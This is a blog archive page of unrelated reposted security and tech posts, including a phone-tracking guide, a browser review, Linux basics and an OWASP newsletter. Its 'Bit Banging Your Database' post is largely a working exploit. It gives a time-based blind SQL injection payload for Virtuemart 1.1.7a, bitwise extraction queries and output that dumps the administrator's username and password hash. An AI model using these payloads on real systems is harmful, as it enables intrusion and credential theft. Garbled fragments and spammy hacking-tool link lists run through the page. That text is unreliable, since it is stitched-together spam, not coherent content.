Sunday, April 26, 2020

How To Track Iphone Without Them Knowing

Few feelings are as stomach-sinkingly awful as the thought of losing an expensive new iPhone. Whether you left it on the bus or someone slid it out of your back pocket, we put so much store in our phones that their loss leaves is saddened and angered. Most of us keep at least copies of everything in our lives on our phones, from personal conversations to emails, 


To say nothing of all our personal information and social media accounts. Of course there are security measures in place, but nobody wants to risk having all that information fall into the hands of the wrong people. In this article, I will show you how to find a phone that has been lost, whether your own phone or the phone of a friend or family member.

Can you track an iPhone without them knowing?

First off, hopefully you activated the Find My Phone feature of your iPhone when you still had it in your possession. Secondly, if your phone doesn't have service (and thus a connection to the Internet) or if you don't have iCloud set up, then these solutions are not going to work for you. Unfortunately phone technology is advanced but it isn't magical; if your phone isn't talking to the network or if you haven't turned on Find My Phone, then unfortunately the technological solution is probably not going to work. (Seriously. If you have possession of your phone(s) then stop reading this article, pick up your devices, go to Settings and select "Find My Phone" (iPhone) or "Find My Device" (Android) and make sure they are toggled on. TTjem upi cam dp ot/"

Without further ado, let's find your phone!

Can I Tell if Someone is Tracking my iPhone?

 

image1-3

Usually yes, if someone is using the "Find my Phone" feature, it will be displaying things on the iPhone screen. Thankfully, "Find My iPhone" comes pre-loaded on all phones with iOs 9 or newer. "Find my iPhone" is the gold standard when it comes to locating your lost iPhone. The service is integrated as part of iCloud. Here's how to use it to find your missing iPhone then track down your phone's exact location.

Step 1: Open up the "Find My iPhone" on a different device

It doesn't matter if you decide to use your iPad, your laptop, or a friend's iPhone – you can run the Find My Phone app fr0m Mac. You can use the Find my Phone app.

If you are using an Apple product like another phone or an iPad, you can simply click on the app.

If you are using a computer (even a Windows PC will work), go to icloud.com then click on the "Find iPhone" icon. Once you've clicked on the "Find iPhone" icon the website process and "Find my iPhone" app process are the same.

Step 2: Input Your Apple ID Credentials (they are the same as your iCloud info)

Since you are not using your phone, you won't be automatically logged in.

Once you log in to the app, select the "All Devices" drop-down option and then find the device that you want to locate.

Step 3: Once You Select Your Phone, Options Will Appear

As soon as you select your device on the page, iCloud will begin to search for it. If the search is successful, you will see your device on a map, pinpointing it's location. Before you sprint out the door to get it, there are some other options you should take a look at.

Once you select your device you will have three additional options in addition to seeing your phone's location. These options are playing a sound, activating "Lost Mode" and erase the phone.

Playing the sound is a great way to find your phone if you lost it somewhere around your house. If you click the option, an audio alert will go off on your phone which will hopefully help you find it. The alert will sound like a loud pinging noise alerting you that your phone is at home with you and not at the coffee shop you just visited. If you hear the pinging sound then you'll quickly find your phone by just following the sound.

When enabled, Lost Mode will lock your phone with a passcode and will display a message of your choice. This can either ensure it will be safe until you can find it, or will alert the thief what you expect of them and that you know where they are. This mode can also enable location services on your phone too.

However, if things have gone too far and you think there is a very slim chance you will ever get your device back – perhaps your phone has already crossed an international border – the best course of action is to simply erase it. Yes, this is giving up, but it also prevents your personal information getting into the hands of someone who could abuse it.

If you follow these steps, you should have your phone back in your pocket in no time. 

Is there an app to track someones phone without them knowing?

maxresdefault-11

What if you're looking for someone else's phone? I'm sorry to burst your bubble, but you are not allowed to track someone else's phone without their knowledge. While there are supposedly apps that you can install on a target's phone to track it and keep tabs on what they are doing on it, that is completely illegal and immoral. In addition to the moral issue, there is the practical fact that they could find the app which could lead to a very awkward situation, possibly one involving the police.

However, there are times when you want to find a friend's phone and you have a legitimate reason, and (the important part) they have given you permission to find it. Just as when you were looking for your own phone, there is an app that can help you find the phones of your friends and family with ease. The "Find My Friends" app used to be an extra download, but now it comes with iOS, so if your friends have ever updated their phone, they should have it.

"Find My Friends" is an app that basically allows you to share your location with others and vice versa. It can be great for keeping track of where your kids are, knowing what your significant other is doing, or just keeping tabs on your friends. It can also help them find a lost phone (as long as you have "Shared Locations" with them). Here is how to set it up:

Step 1: Open the app on your phone and the phone of the person you want to be able to share locations with.

Step 2: Click your profile in the bottom left of the screen.

Step 3: Enable "Share My Location" and make sure AirDrop is enabled on your own phone.

Step 4: From there, your friends and family will be able to search/add you to share your location with them and vice versa. You each will need to accept the "Shared Location" request from the other. Now, you can just click on their profile in the app and keep track of them.

As you likely realized while reading this article, it is a much better idea to be proactive than reactive when it comes to tracking phones. If you set up "Find My iPhone" and "Find My Friends" before your phone gets stolen or lost, it will save you a lot of potential hassle down the road. While it may be a bit worrisome to have someone be able to see your location at all times, it can really save you once your phone goes missing and you need to track it down. It is obviously best to pick someone who you trust not to take advantage of the information an app like "Find My Friends" can provide them.

No one deserves to have their phone stolen or go missing, but thankfully, there are some ways to find it, or at least have the information deleted. Hopefully, this guide helped you be able to find your phone or the phone of your friends and family, or at least prepared you for when it may happen.

If you have other ways of finding a lost phone, please share them with us below!

@EVERYTHING NT

Related articles

Posted by at No comments:

Saturday, April 25, 2020

Zero-Day Warning: It's Possible To Hack iPhones Just By Sending Emails

Watch out Apple users! The default mail app pre-installed on millions of iPhone and iPad has been found vulnerable to two critical flaws that could let remote hackers secretly take complete control over Apple devices just by sending an email to targeted individuals. According to cybersecurity researchers at ZecOps, the vulnerabilities in question are out-of-bounds write and remote heap

via The Hacker News
This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com
More information

Posted by at No comments:

Wednesday, April 22, 2020

Hackable - Secret Hacker | Vulnerable Web Application Server

Related news


  1. Elladodelmal
  2. Windows Hacking
  3. Growth Hacking Madrid
  4. Password Hacking
  5. Hacking Kali Linux
  6. Que Es Hacking Etico
  7. Hacker Seguridad Informática
  8. Software Hacking
  9. Raspberry Hacking
Posted by at No comments:

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.
Related news

Posted by at No comments:

Linux Command Line Hackery Series - Part 3


Welcome back, hope you are enjoying this series, I don't know about you but I'm enjoying it a lot. This is part 3 of the series and in this article we're going to learn some new commands. Let's get started

Command: w
Syntax:      w
Function:   This simple function is used to see who is currently logged in and what they are doing, that is, their processes.

Command:  whoami
Syntax:       whoami
Function: This is another simple command which is used to print  the  user  name  associated  with the current effective user ID.

Try it and it will show up your user name.

If you want to know information about a particular user no matter whether it is you or someone else there is a command for doing that as well.

Command: finger
Syntax:      finger [option] [username]
Function:   finger is a user information lookup program. The [] around the arguments means that these arguments are optional this convention is used everywhere in this whole series.

In order to find information about your current user you can simply type:

finger username

Here username is your current username.
To find information about root you can type:

finger root

and it will display info about root user.

Command: uname
Syntax:      uname [options]
Function:   uname is used to display information about the system.

uname is mostly used with the flag -a, which means display all information like this:

uname -a

Command: df
Syntax:      df [option] [FILE ...] 
Function:   df is used to display the amount of space available.
If you type df in your terminal and then hit enter you'll see the used and available space of every drive currently mounted on the system. However the information is displayed in block-size, which is not so much human friendly. But don't worry we can have a human friendly output as well using df by typing:

df -h

the -h flag is used to display the used and available space in a more user friendly format.
We can also view the info of a single drive by specifying the drive name after df like this:

df -h /dev/sda2

That's it for now about df, let's move on.

Command:  free
Syntax:       free [options]
Function:    free is used to display the amount of free and used physical memory and swap memory in the system.
Again the displayed information is in block-size to get a more human readable format use the -h flag like this:

free -h

Command: cal
Syntax:      cal [options]
Function:    cal stands for calendar. It is used to display the calendar.

If you want to display current date on the calendar you can simply type:

cal

and wohooo! you get a nice looking calendar on screen with current date marked but what if you want to display calendar of a previous month well you can do that as well. Say you want to display calendar of Jan 2010, then you'll have to type:

cal -d 2010-01

Nice little handy tool, isn't it?

Command: file
Syntax:      file filename ...
Function:   file is an awesome tool, it's used to classify a file. It is used to determine the file type.

Let's demonstrate the usage of this command by solving a Noob's CTF challenge using file and base64 commands. We'll talk about base64 command in a bit. Go to InfoSecInstitute CTF Website. What you need to do here is to save the broken image file on your local computer in your home directory. After saving the file open your terminal (if it isn't already). Move to your home directory and then check what type of file it is using the file command:

cd
file image.jpg

Shocking output? The file command has identified the above file as an ASCII text file which means the above file is not an image file rather it is a text file now it's time to see it's contents so we'll type:

cat image.jpg

What is that? It's some kind of gibberish. Well it's base64 encoded text. We need to decode it. Let's learn how to do that.

Command: base64
Syntax:       base64 [option] FILE ...
Function:    base64 command is used to encode/decode data and then print it to stdout.

If we're to encode some text in base64 format we'd simply type base64 hit enter and then start typing the text in the terminal after you're done hit enter again and then press CTRL+D like this:

base64
some text here
<CTRL+D>
c29tZSB0ZXh0IGhlcmUK        # output - the encoded string

But in the above CTF we've got base64 encoded data we need to decode it, how are we going to do that? It's simple:

base64 -d image.jpg

There you go you've captured the flag.
The -d flag here specifies that we want to decode instead of encode and after it is the name of file we want to decode.

Voila!
So now you're officially a Hacker! Sorry no certificates available here :)

That's it for this article meet ya soon in the upcoming article.

More info


Posted by at No comments:

Monday, April 20, 2020

What Is Brave Browser And How Does It Compares To Chrome ?

       There are more competing web browsers than ever, with many serving different niches. One example is Brave, which has an unapologetic focus on user privacy and comes with a radical reimagining of how online advertising ought to work.

Brave is based on Chromium, the open-source code that forms the basis for Google Chrome. But is it any good? And for those using Google Chrome, is it worth switching to Brave?

A Brief History of Brave

When Brendan Eich and Brian Bondy founded Brave in 2015, they wanted to address what they perceived as the biggest problem with the modern internet: intrusive advertising.

Advertising is the fuel that powers the modern internet, allowing websites and digital creatives to monetize their content without charging users for each article read or every video watched. That said, Eich and Bondy think it's got some pretty significant downsides, citing the potentially privacy-harming nature of advertising trackers, as well as the negative impact it has on the overall user experience.

Brave's first release came about amidst two significant trends, which ultimately defined the new browser.

First, the cryptocurrency revolution was in full swing. Companies and individuals alike—like the pseudonymous Satoshi Nakamoto—were creating their own decentralized cryptocurrencies, which quickly reached billion-dollar market capitalizations. Second, ad-blocking technology entered the mainstream. By the decade's halfway point, millions of people were blocking ads online across all browsers, desktop, and mobile.

Brave was one of the first browsers to include built advertisement and tracker blockers, leapfrogging the likes of Opera. It also came with its own cryptocurrency, called BAT (or Basic Attention Token), allowing users to reimburse the sites and creators they like.

Essentially, Brave wants to re-imagine how the Internet works: not just on a usability level, but on an economic level. It's an undeniably radical vision, but you wouldn't expect any less, given its founding team.

Brendan Eich is the inventor of the JavaScript programming language and co-founded the Mozilla Foundation, which created the popular Firefox web browser. He also briefly served as the foundation's CEO before resigning following a bitter controversy over his political donations. Brian Bondy is also ex-Mozilla, and spent time at education startup Khan Academy.

Beyond that, Brave is a reasonably standard browser. Like Edge, Chrome, and Opera, it's built upon the Blink rendering engine, which means webpages should work as you expect. Brave is also compatible with Chrome extensions.

To Track or Not to Track?

The Brave browser is characterized by an unapologetically pathological focus on user privacy. Its primary mechanism for delivering this is something called Brave Shields, which combines traditional tracker-blocking technology, paired with several under-the-hood browser configuration tweaks. This feature is turned on by default, although users can easily de-activate it should it cause websites to break.

As you might expect, Brave blocks trackers based on whether they appear in several public blocklists. Going beyond that, it also uses cloud-based machine learning to identify trackers that slipped through the net, in addition to browser-based heuristics.

Brave Shields also forces sites to use HTTPS, where both an encrypted and unencrypted option is available. By forcing users to use an encrypted version of a website, it makes it harder for those on your network to intercept and interfere with the content you visit. While this sounds abstract, it's more common than you think. Public Wi-Fi hotspots, like those found in airports, routinely inject their own ads into websites being visited. Although upgrading to SSL isn't a silver bullet against all security and privacy, it's a pretty significant security upgrade.

Separately from Shields, Brave also includes a built-in TOR browser. TOR allows users to circumvent local censorship — like that which occurs on a national or ISP level — by routing traffic through other computers on its decentralized network.

The tool, which was funded by the US Department of Defence, is frequently used by dissidents living under authoritarian governments to escape surveillance and censorship. Both Facebook and the BBC offer their own TOR 'onion' sites for this reason. Somewhat of a double-edged sword, it's also used by bad actors — drug dealers, hackers, and other online criminals — to operate free from the scrutiny of law enforcement.

Going Batty for BAT

As mentioned, Brave uses its own cryptocurrency, called BAT, for rewarding websites for the content they appreciate. Microtransaction-based tipping is nothing new. Flattr pioneered it almost a decade ago. What's different about BAT is both the implementation and the scale.

While Flattr used traditional fiat-based currencies (by that, I mean currencies like pounds, dollars, and euros), Flattr has its own fungible (essentially, convertible) cryptocurrency based on the Ethereum blockchain. And, as a browser with mainstream aspirations, Brave can deliver this concept to millions of people.

So, let's talk about how it works. Firstly, it's entirely optional. Users can choose to use brave without even touching the BAT micropayments system. By default, it's turned off.

If you decide to opt-in, users can purchase BAT through a cryptocurrency exchange, like Coinbase. They can also earn it by viewing "privacy-respecting" ads. Rather than traditional banner-based advertising, these present as push notifications. Users can choose to dismiss a notification or view it in full-screen.

Unlike traditional advertising networks, the calculations determining what advertisements to show you are performed on your own device. This means the advertiser isn't able to build a profile of you and your interests.

Of all advertising revenue that Brave receives, it shares 70 percent with users, keeping a 30 percent share. It's also worth noting that Brave's advertising program is only available in a handful of countries, mostly scattered across Europe and the Americas, plus Israel, India, Australia, South Africa, the Philippines, Singapore, and New Zealand.

Once you have some BAT, you can spend it. You can choose to automatically contribute to specific sites or tip creators on an ad-hoc basis. You can even tip individual tweets. When you open Twitter through your browser, Brave will automatically add a button to each post within your newsfeed. Pressing it will open a drop-down window, where you confirm your tip.

The sites accepting BAT include The GuardianThe Washington Post, and Slate, as well as popular tech publications like Android Police and The Register. Brave also plans to allow users to spend their rewards for more tangible rewards: like hotel stays, gift cards, and restaurant vouchers. At the time of publication, this system isn't yet available.

How Does Brave Compare to Google Chrome?

Google Chrome commands the majority of the browser market, with other competitors, including Brave, trailing behind. Independent figures about Brave's adoption aren't readily available. It doesn't show on NetMarketShare or W3Counter, as it uses Chrome's user-agent string. In October, however, the company behind Brave reported eight million monthly active users and 2.8 million daily active users.

While that's pocket change in the broader Internet ecosystem, it's still fairly impressive for a young company that's trying to disrupt a market dominated by a small handful of well-entrenched players, like Mozilla, Google, Microsoft, and Apple.

Brave promises to be faster and less energy-intensive than rival browsers, and it delivers on this. Scientific benchmarks, plus my own anecdotal experiences, pay testament to this. Furthermore, when you open a new tab, Brave shows you how much time you've saved by using it.

However, there are small annoyances you perhaps wouldn't get with other browsers. Functionality that comes standard in Chrome, like the ability to automatically translate webpages, is only available through plug-ins.

You also occasionally encounter webpages that force you to "drop" your shield to access it. And while this isn't Brave's fault, it does highlight the fact that a huge part of the conventional Internet isn't quite prepared to embrace its utopian vision of how content should be monetized.

A Brave New World?

Should you ditch Google Chrome for Brave? Maybe. There's a lot to appreciate about this browser. While it's generally fast, it also feels extremely polished. I appreciate the fact that it comes with both light and dark themes and the ease in which it allows users to protect their privacy from cross-site trackers.

But Brave is more than a browser. It's a statement about how the Internet should work. And while most people will agree that the pace and scale of online tracking should be rolled back, many may disagree whether cryptocurrencies are the best way to monetize content that is otherwise funded by traditional in-browser advertising. And are push notification-based advertisements on your desktop really a less irritating form of advertising?

Ultimately, the question is whether you agree with Brave's approach or not.

@£√£RYTHING NT

Related links
Posted by at No comments:

Bit Banging Your Database

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit. 

Examples showing time difference:
 mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value: 

Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128 
01000001
10000000
-----------
00000000 

value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :


          if($order_id === "" || $order_id === null)
          {
                        $vmLogger->debug("Could not find order ID via invoice");
                        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
                        $qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
                        $db->query($qv);
                        print($qv);
                        if( !$db->next_record()) {
                                $vmLogger->err("Error: No Records Found.");
                        }
The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#  
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.


More info


  1. Game Hacking
  2. Nsa Hack Tools Download
  3. Hacking Tools Kit
  4. Hacking Tools For Kali Linux
  5. Hack Rom Tools
  6. Pentest Tools Windows
  7. Tools 4 Hack
  8. Wifi Hacker Tools For Windows
  9. Hak5 Tools
  10. Hackrf Tools
  11. Pentest Tools
  12. Hackrf Tools
  13. Hacking Tools For Windows Free Download
  14. Pentest Tools For Ubuntu
  15. Hack Tools 2019
  16. Pentest Tools For Android
  17. Hack Tools
  18. Kik Hack Tools
  19. Hacker Search Tools
  20. Pentest Tools Nmap
  21. New Hacker Tools
  22. Hacker Tools For Windows
  23. Hacking Tools Online
  24. How To Install Pentest Tools In Ubuntu
Posted by at No comments:

Memoryze


"MANDIANT Memoryze is free memory forensic software that helps incident responders find evil in live memory. Memoryze can acquire and/or analyze memory images, and on live systems can include the paging file in its analysis." read more...

Download: http://fred.mandiant.com/MemoryzeSetup.msi

Continue reading


  1. Hacking Tools For Pc
  2. Hacker Security Tools
  3. Hacking Tools Usb
  4. Hacking Tools Name
  5. Hack Tools For Pc
  6. Hacker Search Tools
  7. Beginner Hacker Tools
  8. Pentest Tools Windows
  9. Hacker
  10. Hacker Tools For Ios
  11. Pentest Recon Tools
  12. Pentest Tools List
  13. Install Pentest Tools Ubuntu
  14. Growth Hacker Tools
  15. Install Pentest Tools Ubuntu
  16. Tools 4 Hack
  17. Hacker Tools Windows
  18. Hack Tools Github
  19. Hack Tools Github
  20. Pentest Tools
Posted by at No comments:

November 2019 Connector

OWASP
Connector
November 2019

COMMUNICATIONS


Letter from the Vice-Chairman

Dear OWASP Community, 

Preparation for next year's conferences is underway. I had the pleasure of meeting people from our community at a recent ISACA Ireland event where I had an OWASP stand. I also had lots of swag to give away, loads left which I plan to share out amongst the community. 

I was on a call recently with both WIA leadership and a number of individuals looking to broaden our diversity reach, forming DIA (diversity in AppSec). This was a positive call and I look forward to reviewing their proposal under the committee 2.0 operating model.

I'd like to thank our volunteers, chapter and project leaders for making OWASP what it is today. We wouldn't have a foundation without you. We always want to make things better, to this end, it would be great if you could fill out the following feedback form.

Thank you, 
Owen Pendlebury, Vice-Chairman

FROM THE EXECUTIVE DIRECTOR


As we wind down 2019, we are planning lots of new opportunities to get involved with OWASP next year. The current working draft of the 2020 Operating Plan can be found on our staging site for our new website which is planned to launch next month.
 
Some of the highlights for 2020:
  • Quarterly Town Hall meetings.
  • Two Project Summits - the first in February 2020
  • Pilot single-day AppSec Days worldwide to offer local training and community.
We are also set to further increase the transparency of the daily workings of OWASP through our Staff Projects page. The pages linked there will always be a work in progress; some of which today are still only templates but still a great resource to know what's going on at OWASP.

All of this which adds to our Global and Regional Events, ongoing local chapter support, and other member activities. Our plans are ambitious and we look forward to your continued support this and every month as we look to better secure the web.



OWASP Foundation Global AppSec Event Dates for 2020

Global AppSec Dublin, June 15 - 19, 2020
(Formerly known as AppSec EU)
Sponsorship is now available
Call for Papers & Call for Training December 2019
 
Global AppSec San Francisco, October 19 - 23, 2020
(Formerly known as AppSec US)
CFP &  CFT February 2020

** Visit our website for future announcements.**
NEW OWASP Project Summit - Winter 2020
February 2020 in Cancun, Mexico
 
The OWASP Foundation will host a three-day working session for FIVE selected projects in Cancun, Mexico, February 2020. Arrival day will be Wednesday the 19th and departures will be the 23rd. Projects must apply and then get selected to participate. The application process will require project meeting goals, work plans, key contributors, and expected attendance. The OWASP Foundation Officers Group will make the final selection. For more information click here

You can also email Emily Berman Global Events Director or Harold Blankenship Director of Technology and Projects.
Announcing a New Opportunity to become part of a Global AppSec Program Team
 
Conference Program Teams are constituted for each Global AppSec event and consists of members of OWASP members and staff. The selection of team members is based on subject-matter expertise and a balanced representation of the OWASP community. For planning purposes, team members shall reside on the continent of the Global AppSec for which they serve. Teams are constituted no later than six months prior to the Global AppSec event.

To apply to become a member of the Conference Program Team click here.


 
We are so excited to announce that both the London OWASP and WIA community have been asked to speak at BlackHat Europe 2019 on Wednesday 4 December at the EXCEL London.   Andra Lezza is leading the panel of women to "Share insights gained at different stages of their careers to help other women in the field."  Thank you, Andra, for leading the initiative and also to Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel.  Also from the OWASP Community and a London Chapter Leader Sam Stepanyan and Paul Harragan.  Sam and Pau will be presenting a more in-depth demo on the OWASP Nettacker.  Good luck to all the speakers have a great conference.

I would like to encourage all of the OWASP community that will be attending BlackHat Europe to please make every effort to attend and support our fellow OWASP members Wednesday, 4 December 2019. (Click to view the schedule details.)

OWASP Members don't forget you are eligible for € 200.00 discount, email marketing@owasp.org for code to use when registering.


BlackHat Europe has extended an invitation to our London WIA community  to  lead a panel to "Share insights gained at different stages of their careers that could help other women in the field."  Thank you to Andra Lezza for leading this initiative and Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel and to contribute.  Good luck I am sure your session will be a huge success.

BlackHat Europe 2019 London at EXCEL London
2019 December 2-5 
The OWASP Booth 1015
Business Hall December 4 & 5 
December 4, 10:30 AM - 7:00 PM
December 5: 10:00 AM - 4:00 PM

EVENTS 

You may also be interested in one of our other affiliated events:


REGIONAL EVENTS
Event DateLocation
German OWASP Day 2019 December 10, 2019 Karlsruhe, Germany
AppSec California 2020 January 21 - 24, 2020 Santa Monica, CA
OWASP New Zealand Day 2020 February 20 - 21, 2020 Auckland, New Zealand
OWASP Seasides March 3 - 5, 2020 Panjim Goa, India
SnowFROC 2020 March 5, 2020 Denver, CO
AppSec Morocco & Africa 2020 June 4 - 5, 2020 Rabat, Morocco

GLOBAL PARTNERSHIP EVENTS
Event Date Location
BlackHat Europe 2019 December 2 - 5, 2019 London

PROJECTS


As the foundation moves toward the migration of the OWASP web presence from the old wiki site to our new Github-hosted home, some of you may still have questions regarding what to move and how to move it. Essentially, if you have a chapter page or project page and you have not migrated it to the new website, that would be first. Steps on what to do and what is needed can be found at https://www2.owasp.org/migration There are also some minor instructions on the default project or chapter page itself. And if you are wondering where that page is located, you can go to https://github.com/OWASP and type your chapter name in the repository search bar. If your project or chapter is not there, contact me. Lastly, there are a number of excellent examples already done by other leaders (also linked on the migration page).

And, as a precaution, you should click over into the 'Settings' of your repository and then click the 'Collaborators & teams' link on the left menu and check to make sure that the usernames added to Collaborators match what you expect.  Having someone you do not know edit your web page without your knowledge is no longer the expected behavior.

Some resources, mostly for projects, have been uploaded to the OWASP Site Theme Repository and can be linked to via the /assets/image/common/<file> URL.

After your chapter or project page is done, there is a www-community repository which would include any files from the wiki that are not currently in a project or chapter or board/staff policy area.  For instance, there are pages there for GSoC and XSS and CSRF.  A list of the top pages that need to be migrated can be found attached to one of the TODO cards on our website migration Trello board which you are invited to join if you want to help migrate loose pages and/or perform some automation work.

Our current plan can be found on the Website Relaunch project page.

PROJECT ANNOUNCEMENT

As part of OWASP's participation in Google's Season of Docs, the ZAP project has had Nirojan Selvanathan (@sshniro)  working on API documentation.  The first iteration of the documentation is now live.  It includes Java, Python, and shell
example snippets all presented in a responsive and accessible design which we will continue to build on in the future.

Big thanks to Nirojan for his efforts on this wonderful initiative!
Congratulations and thanks to Google Open Source for helping to bring the open-source and technical writer communities together!

COMMUNITY

 
Welcome to our New OWASP Chapters

Colombo, Sri Lanka
Des Moines, IA
Harrisburg, PA
Louisville, KY
Monterrey, Brazil
Moscow, Russia


 
Contributor Corporate Members
 

 
*Ads and logos are not endorsements and reflect the messages of the advertiser only. *
Join us
Donate
Our mailing address is:
OWASP Foundation 
1200-C Agora Drive, #232
Bel Air, MD 21014  
Contact Us
Unsubscribe






